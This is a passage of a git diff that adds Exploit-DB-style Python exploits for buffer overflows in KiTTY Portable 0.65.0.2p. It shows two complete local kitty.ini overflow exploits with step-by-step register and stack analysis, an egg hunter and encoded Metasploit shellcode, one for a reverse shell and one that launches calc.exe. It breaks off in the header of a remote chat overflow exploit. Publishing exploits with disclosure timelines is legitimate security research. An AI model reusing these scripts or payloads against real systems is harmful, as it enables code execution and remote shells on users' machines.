+2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter
+2015-11-15: KiTTY 0.66.6.1p released, seems fixed
+2015-12-28: exploit published
+
+Description :
+-------------
+A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into
+the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is
+overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use
+kitty_portable.exe addresses, which start with a NULL. Successful exploitation will grant an
+attacker a reverse shell on Windows 7 Pro x64.
+
+Win7 -> Code Execution
+
+Instructions:
+-------------
+- Run exploit
+- Launch KiTTY
+
+Exploitation:
+-------------
+As EDX register points to our buffer, it seems like using a return address pointing to a
+JMP EDX instruction would do the trick. However this is not the case, because of the address containing
+a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be
+overwritten:
+
+EAX = 00000041
+00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX]
+00533DA4 00 DB 00
+
+Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash,
+but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking
+like a deadend, is in fact exploitable:
+
+ECX and EBX points to our buffer
+EDX and EDI are overwritten by our buffer
+
+EDI = 41414141
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI]
+
+Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI
+at offset 1048. We can write a valid memory address into EDI, allowing the program to continue
+its execution. One such address is the address ESP points to on the stack: 0x0028C4F8.
+Let's take a closer look to the code executed:
+
+
+764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here
+764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX]
+764F8DBF 03D0 ADD EDX,EAX
+764F8DC1 83F0 FF XOR EAX,FFFFFFFF
+764F8DC4 33C2 XOR EAX,EDX
+764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX]
+764F8DC8 83C1 04 ADD ECX,4
+764F8DCB A9 00010181 TEST EAX,81010100
+764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9
+
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE
+764F8DD4 83C7 04 ADD EDI,4
+764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above
+
+1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address
+2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF,
+overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our
+buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction
+following this code:
+
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE
+764F8DD4 83C7 04 ADD EDI,4
+764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8
+764F8DD9 84D2 TEST DL,DL
+764F8DDB 74 32 JE SHORT msvcrt.764F8E0F
+764F8DDD 84F6 TEST DH,DH
+764F8DDF 74 15 JE SHORT msvcrt.764F8DF6
+764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000
+764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF
+764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX
+764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
+764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0
+764F8DF4 5F POP EDI
+764F8DF5 C3 RETN <------- We want that !
+
+This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction.
+If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would
+give us the control of the execution flow.
+
+When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP
+has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-)
+
+However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no
+crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end
+of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and
+take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI.
+
+1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL
+2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there
+for EDI
+3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try
+to make ESP pointing to it when the crash happens.
+
+After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time
+of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make
+EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4.
+As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'.
+
+To sume it up:
+1) First crash with EIP overwritten seems not exploitable
+2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers
+3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack
+4) The RET instruction is reached and execution crashes again
+5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct
+offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow.
+
+That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building,
+who do all the work for us inside, and goes out back to us with the vault key (EIP).
+
+Finally, as the memory area we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required.
+"""
+
+egg = "w00t" # \x77\x30\x30\x74
+
+# Wow64 Egghunter - Corelan Team
+# Written by Lincoln (lincoln@corelan.be)
+# Size: 46 bytes
+egghunter = (
+"\x31\xdb" # XOR EBX, EBX
+"\x53" # PUSH EBX
+"\x53" # PUSH EBX
+"\x53" # PUSH EBX
+"\x53" # PUSH EBX
+"\xb3\xc0" # MOV BL,0xc0
+"\x66\x81\xCA\xFF\x0F" # OR DX,0FFF
+"\x42" # INC EDX
+"\x52" # PUSH EDX
+"\x6A\x26" # PUSH 26
+"\x58" # POP EAX
+"\x33\xC9" # XOR ECX,ECX
+"\x8B\xD4" # MOV EDX,ESP
+"\x64\xff\x13" # CALL DWORD PTR FS:[ebx]
+"\x5e" # POP ESI
+"\x5a" # POP EDX
+"\x3C\x05" # CMP AL,5
+"\x74\xe9" # JE SHORT egg.0043F000
+"\xB8\x77\x30\x30\x74" # MOV EAX,74303077 w00t
+"\x8B\xFA" # MOV EDI,EDX
+"\xAF" # SCAS DWORD PTR ES:[EDI]
+"\x75\xe4" # JNZ SHORT egg.0043F001
+"\xAF" # SCAS DWORD PTR ES:[EDI]
+"\x75\xe1" # JNZ SHORT 0043F001
+"\xFF\xE7" # JMP EDI
+)
+
+# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want)
+# Encoder: x86/alpha_mixed
+# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31
+# Size: 710 bytes
+shellcode = (
+"\x89\xe3\xda\xd4\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x6b\x4c\x48\x68\x4c\x42\x45\x50\x57\x70\x67\x70\x33\x50\x4e"
+"\x69\x49\x75\x35\x61\x39\x50\x53\x54\x6c\x4b\x32\x70\x76\x50"
+"\x6c\x4b\x56\x32\x46\x6c\x4c\x4b\x73\x62\x46\x74\x4c\x4b\x72"
+"\x52\x54\x68\x64\x4f\x6f\x47\x33\x7a\x57\x56\x44\x71\x49\x6f"
+"\x6c\x6c\x55\x6c\x63\x51\x33\x4c\x77\x72\x56\x4c\x61\x30\x6a"
+"\x61\x4a\x6f\x76\x6d\x66\x61\x6f\x37\x6b\x52\x6a\x52\x56\x32"
+"\x73\x67\x4c\x4b\x62\x72\x46\x70\x6c\x4b\x33\x7a\x67\x4c\x4c"
+"\x4b\x30\x4c\x76\x71\x64\x38\x49\x73\x53\x78\x77\x71\x4b\x61"
+"\x53\x61\x4c\x4b\x30\x59\x51\x30\x35\x51\x4a\x73\x4c\x4b\x47"
+"\x39\x67\x68\x68\x63\x36\x5a\x33\x79\x6e\x6b\x44\x74\x6c\x4b"
+"\x36\x61\x6b\x66\x44\x71\x49\x6f\x4e\x4c\x49\x51\x38\x4f\x56"
+"\x6d\x66\x61\x6f\x37\x56\x58\x4b\x50\x51\x65\x59\x66\x54\x43"
+"\x43\x4d\x68\x78\x45\x6b\x63\x4d\x75\x74\x33\x45\x4a\x44\x30"
+"\x58\x6c\x4b\x71\x48\x35\x74\x47\x71\x5a\x73\x65\x36\x6c\x4b"
+"\x76\x6c\x42\x6b\x6e\x6b\x30\x58\x55\x4c\x36\x61\x79\x43\x6c"
+"\x4b\x55\x54\x6e\x6b\x37\x71\x7a\x70\x6b\x39\x70\x44\x71\x34"
+"\x65\x74\x43\x6b\x53\x6b\x73\x51\x73\x69\x42\x7a\x73\x61\x4b"
+"\x4f\x4d\x30\x73\x6f\x53\x6f\x32\x7a\x4c\x4b\x62\x32\x68\x6b"
+"\x6e\x6d\x63\x6d\x30\x68\x50\x33\x44\x72\x63\x30\x53\x30\x33"
+"\x58\x50\x77\x43\x43\x45\x62\x71\x4f\x30\x54\x43\x58\x72\x6c"
+"\x54\x37\x34\x66\x73\x37\x6b\x4f\x6e\x35\x4e\x58\x7a\x30\x76"
+"\x61\x37\x70\x65\x50\x64\x69\x6a\x64\x32\x74\x72\x70\x50\x68"
+"\x34\x69\x4d\x50\x62\x4b\x45\x50\x79\x6f\x68\x55\x46\x30\x56"
+"\x30\x66\x30\x62\x70\x73\x70\x72\x70\x63\x70\x72\x70\x42\x48"
+"\x38\x6a\x74\x4f\x6b\x6f\x6b\x50\x79\x6f\x69\x45\x6f\x67\x63"
+"\x5a\x65\x55\x50\x68\x79\x50\x6c\x68\x6d\x57\x4d\x53\x32\x48"
+"\x36\x62\x57\x70\x67\x61\x43\x6c\x6b\x39\x4b\x56\x71\x7a\x76"
+"\x70\x73\x66\x51\x47\x43\x58\x6f\x69\x59\x35\x54\x34\x43\x51"
+"\x79\x6f\x49\x45\x4e\x65\x4f\x30\x63\x44\x44\x4c\x79\x6f\x50"
+"\x4e\x56\x68\x53\x45\x7a\x4c\x73\x58\x6c\x30\x4e\x55\x4c\x62"
+"\x46\x36\x69\x6f\x38\x55\x55\x38\x53\x53\x42\x4d\x70\x64\x55"
+"\x50\x4e\x69\x68\x63\x33\x67\x72\x77\x76\x37\x36\x51\x4a\x56"
+"\x61\x7a\x54\x52\x46\x39\x53\x66\x4b\x52\x69\x6d\x71\x76\x49"
+"\x57\x30\x44\x46\x44\x77\x4c\x57\x71\x47\x71\x4e\x6d\x47\x34"
+"\x37\x54\x62\x30\x58\x46\x77\x70\x53\x74\x43\x64\x52\x70\x42"
+"\x76\x43\x66\x33\x66\x51\x56\x53\x66\x72\x6e\x66\x36\x46\x36"
+"\x52\x73\x72\x76\x30\x68\x52\x59\x48\x4c\x47\x4f\x4b\x36\x6b"
+"\x4f\x59\x45\x6f\x79\x4b\x50\x52\x6e\x51\x46\x57\x36\x39\x6f"
+"\x66\x50\x75\x38\x55\x58\x4d\x57\x45\x4d\x51\x70\x69\x6f\x4e"
+"\x35\x6f\x4b\x78\x70\x6c\x75\x6d\x72\x42\x76\x32\x48\x4d\x76"
+"\x7a\x35\x4d\x6d\x6d\x4d\x79\x6f\x68\x55\x57\x4c\x65\x56\x71"
+"\x6c\x74\x4a\x6d\x50\x69\x6b\x4b\x50\x70\x75\x55\x55\x4f\x4b"
+"\x72\x67\x34\x53\x73\x42\x72\x4f\x73\x5a\x63\x30\x52\x73\x4b"
+"\x4f\x39\x45\x41\x41"
+)
+
+# Stack address where to copy our shellcode, with an offset of ESP - 1052
+edi = '\xE4\xC0\x28' # 0x0028C0E4 WIN7 Pro x64
+
+nops = '\x90' * 8
+eggmark = egg * 2
+padding = '\x41' * (1048 - len(nops) - len(egghunter))
+
+# The memory area we land makes bigger shellcode crashes after being decoded
+# Using a 46 bytes egg hunter and putting our shellcode somewhere else solves this problem
+payload1 = nops + egghunter + padding + edi # Egg Hunter
+payload2 = eggmark + nops + shellcode # Final Shellcode
+
+# Kitty.ini configuration file
+buffer ="[ConfigBox]\n"
+buffer +="height=22\n"
+buffer +="filter=yes\n"
+buffer +="#default=yes\n"
+buffer +="#noexit=no\n"
+buffer +="[KiTTY]\n"
+buffer +="backgroundimage=no\n"
+buffer +="capslock=no\n"
+buffer +="conf=yes\n"
+buffer +="cygterm=yes\n"
+buffer +="icon=no\n"
+buffer +="#iconfile=\n"
+buffer +="#numberoficons=45\n"
+buffer +="paste=no\n"
+buffer +="print=yes\n"
+buffer +="scriptfilefilter=\n"
+buffer +="size=no\n"
+buffer +="shortcuts=yes\n"
+buffer +="mouseshortcuts=yes\n"
+buffer +="hyperlink=no\n"
+buffer +="transparency=no\n"
+buffer +="#configdir=\n"
+buffer +="#downloaddir=\n"
+buffer +="#uploaddir=\n"
+buffer +="remotedir=\n"
+buffer +="#PSCPPath=\n"
+buffer +="#PlinkPath=\n"
+buffer +="#WinSCPPath=\n"
+buffer +="#CtHelperPath=\n"
+buffer +="#antiidle== \k08\\\n"
+buffer +="#antiidledelay=60\n"
+buffer +="sshversion=" + payload2 + "\n" # Shellcode
+buffer +="#WinSCPProtocol=sftp\n"
+buffer +="#autostoresshkey=no\n"
+buffer +="#UserPassSSHNoSave=no\n"
+buffer +="KiClassName=" + payload1 + "\n" # Egg Hunter
+buffer +="#ReconnectDelay=5\n"
+buffer +="savemode=dir\n"
+buffer +="bcdelay=0\n"
+buffer +="commanddelay=5\n"
+buffer +="initdelay=2.0\n"
+buffer +="internaldelay=10\n"
+buffer +="slidedelay=0\n"
+buffer +="wintitle=yes\n"
+buffer +="zmodem=yes\n"
+buffer +="[Print]\n"
+buffer +="height=100\n"
+buffer +="maxline=60\n"
+buffer +="maxchar=85\n"
+buffer +="[Folder]\n"
+buffer +="[Launcher]\n"
+buffer +="reload=yes\n"
+buffer +="[Shortcuts]\n"
+buffer +="print={SHIFT}{F7}\n"
+buffer +="printall={F7}\n"
+
+# Location of our Kitty.ini file (modify with your KiTTY directory)
+file = "C:\\kitty\\App\\KiTTY\\kitty.ini"
+try:
+ print "[*] Writing to %s (%s bytes)" % (file, len(buffer))
+ f = open(file,'w')
+ f.write(buffer)
+ f.close()
+ print "[*] Done!"
+except:
+ print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39122.py b/platforms/windows/local/39122.py
new file mode 100755
index 000000000..bc167fb16
--- /dev/null
+++ b/platforms/windows/local/39122.py
@@ -0,0 +1,263 @@
+# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
+# Date: 28/12/2015
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: http://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.9bis.net/kitty/
+# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
+# Version: 0.65.0.2p
+# Tested on: Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
+# Category: Local
+
+"""
+Disclosure Timeline:
+--------------------
+2015-09-18: Vulnerability discovered
+2015-09-26: Vendor contacted
+2015-09-28: Vendor answer
+2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
+2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter
+2015-11-15: KiTTY 0.66.6.1p released, seems fixed
+2015-12-28: exploit published
+
+Description :
+-------------
+A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into
+the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is
+overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use
+kitty_portable.exe addresses, which start with a NULL. Successful exploitation will allow to execute
+local executables on Windows 8.1 and Windows 10.
+
+Win8.1 -> Code Execution
+Win10 -> Code Execution
+
+Instructions:
+-------------
+- Run exploit
+- Launch KiTTY
+
+Exploitation:
+-------------
+As EDX register points to our buffer, it seems like using a return address pointing to a
+JMP EDX instruction would do the trick. However this is not the case, because of the address containing
+a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be
+overwritten:
+
+EAX = 00000041
+00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX]
+00533DA4 00 DB 00
+
+Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash,
+but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking
+like a deadend, is in fact exploitable:
+
+ECX and EBX points to our buffer
+EDX and EDI are overwritten by our buffer
+
+EDI = 41414141
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI]
+
+Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI
+at offset 1048. We can write a valid memory address into EDI, allowing the program to continue
+its execution. One such address is the address ESP points to on the stack: 0x0028C4F8.
+Let's take a closer look to the code executed:
+
+
+764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here
+764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX]
+764F8DBF 03D0 ADD EDX,EAX
+764F8DC1 83F0 FF XOR EAX,FFFFFFFF
+764F8DC4 33C2 XOR EAX,EDX
+764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX]
+764F8DC8 83C1 04 ADD ECX,4
+764F8DCB A9 00010181 TEST EAX,81010100
+764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9
+
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE
+764F8DD4 83C7 04 ADD EDI,4
+764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above
+
+1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address
+2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF,
+overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our
+buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction
+following this code:
+
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE
+764F8DD4 83C7 04 ADD EDI,4
+764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8
+764F8DD9 84D2 TEST DL,DL
+764F8DDB 74 32 JE SHORT msvcrt.764F8E0F
+764F8DDD 84F6 TEST DH,DH
+764F8DDF 74 15 JE SHORT msvcrt.764F8DF6
+764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000
+764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF
+764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX
+764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
+764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0
+764F8DF4 5F POP EDI
+764F8DF5 C3 RETN <------- We want that!
+
+This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction.
+If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would
+give us the control of the execution flow.
+
+When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP
+has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-)
+
+However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no
+crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end
+of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and
+take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI.
+
+1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL
+2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there
+for EDI
+3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try
+to make ESP pointing to it when the crash happens.
+
+After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time
+of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make
+EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4.
+As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'.
+
+To sume it up:
+1) First crash with EIP overwritten seems not exploitable
+2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers
+3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack
+4) The RET instruction is reached and execution crashes again
+5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct
+offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow.
+
+That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building,
+who do all the work for us inside, and goes out back to us with the vault key (EIP).
+"""
+
+import sys
+
+if len(sys.argv) == 1:
+ print "\nUsage: kitty_ini_8_10.py "
+ print "Example: kitty_ini_8_10.py win8.1"
+ sys.exit()
+
+os = sys.argv[1] # Windows version to target
+
+# Metasploit WinExec shellcode (calc.exe)
+# Encoder: x86/alpha_mixed
+# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31
+# Size: 448 bytes
+shellcode = (
+"\x89\xe6\xdd\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x69\x6c\x39\x78\x6f\x72\x57\x70\x77\x70\x65\x50\x55\x30\x6c"
+"\x49\x39\x75\x66\x51\x4f\x30\x65\x34\x4e\x6b\x70\x50\x56\x50"
+"\x4c\x4b\x70\x52\x36\x6c\x6e\x6b\x50\x52\x76\x74\x4c\x4b\x74"
+"\x32\x64\x68\x76\x6f\x48\x37\x50\x4a\x77\x56\x55\x61\x69\x6f"
+"\x6c\x6c\x45\x6c\x33\x51\x33\x4c\x35\x52\x34\x6c\x61\x30\x6b"
+"\x71\x38\x4f\x34\x4d\x76\x61\x5a\x67\x4b\x52\x38\x72\x63\x62"
+"\x52\x77\x4e\x6b\x76\x32\x46\x70\x4e\x6b\x32\x6a\x47\x4c\x4e"
+"\x6b\x50\x4c\x54\x51\x52\x58\x38\x63\x70\x48\x35\x51\x58\x51"
+"\x30\x51\x6c\x4b\x61\x49\x57\x50\x37\x71\x5a\x73\x6c\x4b\x30"
+"\x49\x56\x78\x39\x73\x66\x5a\x52\x69\x6c\x4b\x57\x44\x6e\x6b"
+"\x57\x71\x6b\x66\x34\x71\x4b\x4f\x6e\x4c\x59\x51\x48\x4f\x64"
+"\x4d\x67\x71\x58\x47\x75\x68\x6b\x50\x72\x55\x68\x76\x74\x43"
+"\x43\x4d\x6c\x38\x45\x6b\x73\x4d\x61\x34\x44\x35\x4d\x34\x51"
+"\x48\x4e\x6b\x71\x48\x34\x64\x76\x61\x39\x43\x35\x36\x4e\x6b"
+"\x74\x4c\x62\x6b\x4e\x6b\x50\x58\x67\x6c\x47\x71\x4b\x63\x6e"
+"\x6b\x65\x54\x6c\x4b\x76\x61\x38\x50\x4c\x49\x37\x34\x75\x74"
+"\x37\x54\x73\x6b\x63\x6b\x71\x71\x53\x69\x52\x7a\x43\x61\x79"
+"\x6f\x59\x70\x51\x4f\x61\x4f\x32\x7a\x4c\x4b\x42\x32\x58\x6b"
+"\x4e\x6d\x61\x4d\x43\x5a\x36\x61\x6c\x4d\x4d\x55\x6c\x72\x47"
+"\x70\x67\x70\x77\x70\x42\x70\x32\x48\x45\x61\x4e\x6b\x70\x6f"
+"\x6e\x67\x4b\x4f\x59\x45\x4f\x4b\x4a\x50\x6e\x55\x39\x32\x30"
+"\x56\x30\x68\x4c\x66\x4c\x55\x6f\x4d\x4d\x4d\x49\x6f\x4e\x35"
+"\x55\x6c\x74\x46\x33\x4c\x64\x4a\x6b\x30\x6b\x4b\x4d\x30\x42"
+"\x55\x47\x75\x6f\x4b\x70\x47\x67\x63\x30\x72\x30\x6f\x53\x5a"
+"\x43\x30\x63\x63\x4b\x4f\x38\x55\x32\x43\x61\x71\x50\x6c\x42"
+"\x43\x34\x6e\x33\x55\x44\x38\x43\x55\x33\x30\x41\x41"
+)
+
+# Stack address where to copy our shellcode, with an offset of ESP - 1052
+if os == "win8.1":
+ edi = '\xD4\xC0\x28' # 0x0028C0D4 WIN8.1 Pro x64
+elif os == "win10":
+ edi = '\xD4\xC0\x29' # 0x0029C0D4 WIN10 Pro x64
+else:
+ print "Unknown OS chosen. Please choose 'win8.1' or 'win10'."
+ sys.exit()
+
+nops = '\x90' * 8
+padding = '\x41' * (1048 - len(nops) - len(shellcode))
+
+payload = nops + shellcode + padding + edi
+
+# Kitty.ini configuration file
+buffer ="[ConfigBox]\n"
+buffer +="height=22\n"
+buffer +="filter=yes\n"
+buffer +="#default=yes\n"
+buffer +="#noexit=no\n"
+buffer +="[KiTTY]\n"
+buffer +="backgroundimage=no\n"
+buffer +="capslock=no\n"
+buffer +="conf=yes\n"
+buffer +="cygterm=yes\n"
+buffer +="icon=no\n"
+buffer +="#iconfile=\n"
+buffer +="#numberoficons=45\n"
+buffer +="paste=no\n"
+buffer +="print=yes\n"
+buffer +="scriptfilefilter=\n"
+buffer +="size=no\n"
+buffer +="shortcuts=yes\n"
+buffer +="mouseshortcuts=yes\n"
+buffer +="hyperlink=no\n"
+buffer +="transparency=no\n"
+buffer +="#configdir=\n"
+buffer +="#downloaddir=\n"
+buffer +="#uploaddir=\n"
+buffer +="remotedir=\n"
+buffer +="#PSCPPath=\n"
+buffer +="#PlinkPath=\n"
+buffer +="#WinSCPPath=\n"
+buffer +="#CtHelperPath=\n"
+buffer +="#antiidle== \k08\\\n"
+buffer +="#antiidledelay=60\n"
+buffer +="sshversion=\n"
+buffer +="#WinSCPProtocol=sftp\n"
+buffer +="#autostoresshkey=no\n"
+buffer +="#UserPassSSHNoSave=no\n"
+buffer +="KiClassName=" + payload + "\n"
+buffer +="#ReconnectDelay=5\n"
+buffer +="savemode=dir\n"
+buffer +="bcdelay=0\n"
+buffer +="commanddelay=5\n"
+buffer +="initdelay=2.0\n"
+buffer +="internaldelay=10\n"
+buffer +="slidedelay=0\n"
+buffer +="wintitle=yes\n"
+buffer +="zmodem=yes\n"
+buffer +="[Print]\n"
+buffer +="height=100\n"
+buffer +="maxline=60\n"
+buffer +="maxchar=85\n"
+buffer +="[Folder]\n"
+buffer +="[Launcher]\n"
+buffer +="reload=yes\n"
+buffer +="[Shortcuts]\n"
+buffer +="print={SHIFT}{F7}\n"
+buffer +="printall={F7}\n"
+
+# Kitty.ini file location (modify according to your installation path)
+file = "C:\\kitty\\App\\KiTTY\\kitty.ini"
+try:
+ print "[*] Writing to %s (%s bytes)" % (file, len(buffer))
+ f = open(file,'w')
+ f.write(buffer)
+ f.close()
+ print "[*] Done!"
+except:
+ print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/remote/39119.py b/platforms/windows/remote/39119.py
new file mode 100755
index 000000000..c4c3c674d
--- /dev/null
+++ b/platforms/windows/remote/39119.py
@@ -0,0 +1,341 @@
+# Exploit Title: KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)
+# Date: 28/12/2015
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: http://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.9bis.net/kitty/
+# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
+# Version: 0.65.0.2p
+# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 10 Pro x64 builds 10240/10586 (FR)
+# CVE: CVE-2015-7874
+# Category: Remote
+
+"""
+Disclosure Timeline:
+--------------------
+2015-09-13: Vulnerability discovered
+2015-09-26: Vendor contacted
+2015-09-28: Vendor answer
+2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
+2015-12-28: exploit published
+
+Other KiTTY versions have been released since 0.65.0.3p, not related to this vulnerability. Vendor said he may release a version without chat in a future release,
+while providing an external chat DLL as a separate download.
+
+Description :
+-------------
+A remote overflow exists in the KiTTY Chat feature, which enables a remote attacker to execute code on the
+vulnerable system with the rights of the current user, from Windows XP x86 to Windows 10 x64 included (builds 10240/10586).
+Chat feature is not enabled by default.
+
+WinXP -> Remote Code Execution
+Win7 -> Remote Code Execution
+Win10 -> Remote Code Execution
+
+Instructions:
+-------------
+- Enable Chat feature in KiTTY portable (add "Chat=1" in kitty.ini)
+- Start KiTTY on 127.0.0.1 port 1987 (Telnet)
+- Run exploit from remote machine (Kali Linux is fine)
+
+Exploitation:
+-------------
+When sending a long string to the KiTTY chat server as nickname, a crash occurs. The EIP overwrite does let little room
+for exploitation (offset 54) with no more than 160 to 196 bytes for the shellcode from XP to Windows10. Using a Metasploit
